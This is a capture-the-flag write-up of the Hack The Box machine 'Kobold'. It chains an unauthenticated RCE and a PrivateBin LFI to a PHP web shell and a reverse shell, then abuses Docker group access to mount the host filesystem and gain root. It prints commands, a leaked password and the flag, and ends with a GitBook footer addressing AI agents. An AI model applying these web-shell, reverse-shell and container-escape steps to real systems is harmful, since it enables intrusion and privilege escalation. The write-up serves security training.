> For the complete documentation index, see [llms.txt](https://ajaykumar-kanthi.gitbook.io/write-ups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ajaykumar-kanthi.gitbook.io/write-ups/hack-the-box-season-10/htb-kobold.md).

# HTB - Kobold

## Enumeration and Foothold

### NMAP

```bash
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 9.6p1 Ubuntu 3ubuntu13.15 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http     nginx 1.24.0 (Ubuntu)
443/tcp  open  ssl/http nginx 1.24.0 (Ubuntu)
3552/tcp open  http     Golang net/http server
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FlXeotQRHTwkJXtsUZRpT%2Fimage.png?alt=media&amp;token=7742d63b-f840-4d3f-8047-cfac4f6075e5" alt=""><figcaption></figcaption></figure>

add domain to the hosts file.

### HTTP

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F7zNple8tj3b4Ql1ZW8cn%2Fimage.png?alt=media&amp;token=daac32a2-aa06-458a-af4d-7c5405c0e62f" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FtdJbJpGvSJPRfGs5ACgh%2Fimage.png?alt=media&amp;token=ea64012c-9dff-48e0-804d-0282c86feaed" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FvJSeq0akDdVGvyteFWAq%2Fimage.png?alt=media&amp;token=ae24090a-fb49-42b2-9554-007a97fe6e2f" alt=""><figcaption></figcaption></figure>

add the new domains to the hosts file.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FE9KuYRVbHka3nEjJmNH2%2Fimage.png?alt=media&amp;token=383e71c0-a485-443c-bb7c-35d0262ba4d3" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FHKZpN8SbpTiUk815jdtk%2Fimage.png?alt=media&amp;token=2fc202b5-0dde-4243-b788-680522ff7824" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FY62UlhuHhUVXrSeTQ5MO%2Fimage.png?alt=media&amp;token=a66da7c2-edc2-4514-93f7-367f99b293ef" alt=""><figcaption></figcaption></figure>

settings reveals the version of MCP jammer.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FXZGemD2ROOdCXra5HaXd%2Fimage.png?alt=media&amp;token=260d7be4-207e-4a9b-ab65-786163f914a5" alt=""><figcaption></figcaption></figure>

### CVE-2026-23744

The root cause is a combination of two serious security missteps:

1. **Exposed Network Listener**: By default, MCPJam Inspector binds to `0.0.0.0`. This means it listens for connections on **all network interfaces**, making it accessible from any device on the network, not just the local machine.
2. **No Authentication**: The critical API endpoint, `/api/mcp/connect`, which is used to start MCP servers, has **no authentication or authorization** checks

{% embed url="<https://github.com/fckoo/mcpjaminspector-unauth-rce>" %}

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FhkeIGEdaSl6Y8EMEg7B9%2Fimage.png?alt=media&amp;token=095f0052-5763-4460-9cf2-16dbc1b0db71" alt=""><figcaption></figcaption></figure>

## Shell as Ben

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FLOZ2eI47B5txwuqpqZ3g%2Fimage.png?alt=media&amp;token=fb479f44-5677-4d9e-9ede-26753ef1e56d" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FuUDGeJXKhEqON4gF2t1b%2Fimage.png?alt=media&amp;token=78a878ed-4c1c-45d4-86e0-a358b49ce1cd" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F4zTYybj8fNKVonKbzTKG%2Fimage.png?alt=media&amp;token=e7d867a6-4cdc-46a1-9397-0b5e4ddffe6d" alt=""><figcaption></figcaption></figure>

ben is part of operator group.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F3O4ATqNoGakWGbHI76Y6%2Fimage.png?alt=media&amp;token=7cedde73-d07f-4e49-b0ad-459261c2d985" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FIOnUGhHQgTJVLZWTnbba%2Fimage.png?alt=media&amp;token=5976931d-4c70-4efd-8eee-d922344d9bb6" alt=""><figcaption></figcaption></figure>

curl to the internal port 8080 reveals that the bin.kobold.htb that was identified earlier.

so the private bin is running as root i need to find something that can elevate my privileges to root.

Private bin is running version 2.0.2 based on the version google search revealed a LFI via  session cookie

{% embed url="<https://github.com/Medaz-Sploit/CVE-2025-64714-privatebin-2.0.2-PoC>" %}

### CVE-2025-64714

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F4ziOt8eUrl7bWDNvymPz%2Fimage.png?alt=media&amp;token=c8b1c6cf-6ea8-4ab7-8560-991fffee0790" alt=""><figcaption></figcaption></figure>

based on the poc i need to drop a shell.php into the private bin root directory and access it via the session cookie.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FoRD6YtwrPbjoboigwJma%2Fimage.png?alt=media&amp;token=49b8b198-7c22-4a9b-8dee-ade8572486cc" alt=""><figcaption></figcaption></figure>

so i need to write a shell.php into this directory.

```bash
ben@kobold:/privatebin-data/data$ echo '<?php system($_GET[0]);?>' > shell.php
echo '<?php system($_GET[0]);?>' > shell.php
ben@kobold:/privatebin-data/data$ ls
ls
12  bd  e3  purge_limiter.php  salt.php  shell.php  traffic_limiter.php
ben@kobold:/privatebin-data/data$ chmod +x shell.php
chmod +x shell.php
ben@kobold:/privatebin-data/data$ ls
ls
12  bd  e3  purge_limiter.php  salt.php  shell.php  traffic_limiter.php
ben@kobold:/privatebin-data/data$ 
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FrBUh4gQo8w5tkaMlNLWy%2Fimage.png?alt=media&amp;token=522d6449-59b7-401d-ace4-cfe355982d2c" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FJ3cSHU802ASZuaBJglhC%2Fimage.png?alt=media&amp;token=effe63e9-edd2-4671-96ff-e4d2a65cb882" alt=""><figcaption></figcaption></figure>

that said i will get a reverse shell using the below payload.

{% embed url="<https://github.com/pentestmonkey/php-reverse-shell>" %}

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F2Ikhdo3uujIHjrMM0JPY%2Fimage.png?alt=media&amp;token=9c35fe58-2d21-4f04-b97d-c35fe01073b5" alt=""><figcaption></figcaption></figure>

put the shell as shell.php in the same directory.

and trigger the exploit the same way and we get shell on our machine nc listener

## Shell as nobody

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FUt1GYrbSAGjpGQX6adw0%2Fimage.png?alt=media&amp;token=75ec999d-8d2f-4129-9e16-4525cf81e655" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FJOWp8RoUsGMsBUIhPhSa%2Fimage.png?alt=media&amp;token=bad2b59e-0b33-4265-bd47-0460002f6eb5" alt=""><figcaption></figcaption></figure>

env reveals the conf path reading the config file reveals the passwords.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F8bF9wQaS8JqUs3tQEa1p%2Fimage.png?alt=media&amp;token=e102d5fd-9b11-4a16-ac69-5b6d1d23d9eb" alt=""><figcaption></figcaption></figure>

`privatebin:ComplexP@sswordAdmin1928` for MySQL.

but there is no mysql running on the machine.

i can try to  use those credentials to the arcane that was discovered in nmap scan on port 3552

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FRvc6uxjnzjPj6V5cwBa1%2Fimage.png?alt=media&amp;token=a9e0c73d-8c6f-48c6-a5dd-e6826876961a" alt=""><figcaption></figcaption></figure>

the creds doesnt work.

back on ben shell, he doesnt have permissions for docker.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F3IjRR8OTuhPHv3QrOo6m%2Fimage.png?alt=media&amp;token=252ab246-27a6-43bc-9995-9cc7787501cc" alt=""><figcaption></figcaption></figure>

that said i will try to add him to the docker group

```bash
ben@kobold:~$ newnewgrp docker
newgrp docker
ben@kobold:~$ docker ps           docker ps
docker ps
CONTAINER ID   IMAGE                               COMMAND                  CREATED        STATUS             PORTS                      NAMES
4c49dd7bb727   privatebin/nginx-fpm-alpine:2.0.2   "/etc/init.d/rc.local"   6 months ago   Up About an hour   127.0.0.1:8080->8080/tcp   bin
ben@kobold:~$ 
```

Now Ben can run Docker, and Docker access is often equivalent to root on the host.

```bash
docker run --rm -it -u 0 --entrypoint sh -v /:/mnt privatebin/nginx-fpm-alpine:2.0.2// Some code
```

docker run start a new container\
That bind-mounts the **host’s entire root filesystem** into the container.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FPmyxmXK1UXxamLjxjaKY%2Fimage.png?alt=media&amp;token=0fd58ea0-0d87-443d-9b23-c9ad6aa1b6ca" alt=""><figcaption></figcaption></figure>

## Shell as Root

```bash
~ # chrchroot /mnt sh
chroot /mnt sh
# id
id
uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)
# cd /root
cd /root
# ls
ls
arcane_linux_amd64  data  root.txt
# cat root.txt
cat root.txt
170ebfb1aad70bbc3f3389438ae85a78
# 
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://ajaykumar-kanthi.gitbook.io/write-ups/hack-the-box-season-10/htb-kobold.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
